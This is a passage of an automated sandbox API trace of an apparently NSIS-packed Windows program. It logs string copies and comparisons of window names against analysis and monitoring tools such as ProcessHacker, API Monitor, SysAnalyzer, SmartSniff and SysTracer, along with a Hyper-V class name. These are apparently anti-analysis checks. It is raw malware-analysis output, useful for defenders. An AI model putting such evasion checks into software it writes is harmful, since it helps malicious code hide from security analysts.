lpString2="SmartSniff") returned 1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.544] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrlenA (lpString="tooltips_class32") returned 16 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.544] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.544] lstrcpynA (in: 
lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrlenA (lpString="tooltips_class32") returned 16 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.544] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrlenA (lpString="tooltips_class32") returned 16 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.544] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.544] lstrlenA (lpString="") returned 0 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.544] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.544] lstrlenA (lpString="") returned 0 [0158.544] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.544] lstrcpynA (in: lpString1=0x337684, 
lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.545] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.545] lstrlenA (lpString="3399936") returned 7 [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.545] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.545] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.545] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.545] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.545] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrlenA (lpString="") returned 0 [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x432c00, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrlenA (lpString="") returned 0 [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.546] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.546] lstrlenA (lpString="") returned 0 [0158.546] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.546] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.546] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.546] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.546] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.546] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.546] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.546] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.546] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.546] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.546] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.546] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.547] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.549] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.550] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.550] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.550] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.550] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", 
iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.550] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.550] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.551] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.551] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrlenA (lpString="0") returned 1 [0158.551] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.551] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.551] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.551] lstrcpynA (in: lpString1=0x430000, lpString2="0", 
iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrlenA (lpString="0") returned 1 [0158.551] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrlenA (lpString="") returned 0 [0158.551] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.551] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.551] lstrlenA (lpString="3399936") returned 7 [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.552] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.552] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.552] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.552] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.552] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrlenA (lpString="") returned 0 [0158.552] 
lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrlenA (lpString="") returned 0 [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrlenA (lpString="") returned 0 [0158.552] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.552] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.552] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.553] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.553] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.553] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.553] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.553] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.553] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.553] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.553] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.553] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.553] lstrcpyA 
(in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.553] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.554] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.554] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.554] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.554] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.554] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.554] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.555] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.555] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.555] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.555] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.555] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.555] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.555] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.555] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.555] lstrlenA (lpString="0") returned 1 [0158.555] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.555] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: 
lpString1="3399936") returned="3399936" [0158.555] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.555] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.555] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.556] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.556] lstrlenA (lpString="0") returned 1 [0158.556] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrlenA (lpString="") returned 0 [0158.556] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.556] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrlenA (lpString="3399936") returned 7 [0158.556] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.556] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" 
[0158.556] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.556] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.556] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrlenA (lpString="") returned 0 [0158.556] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.556] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrlenA (lpString="") returned 0 [0158.557] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrlenA (lpString="") returned 0 [0158.557] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.557] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.557] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.557] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.557] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.557] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.557] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.557] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.557] lstrcpynA (in: lpString1=0x40a818, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.558] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.558] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.558] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.558] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.558] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.558] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.558] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.558] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.558] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.558] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", 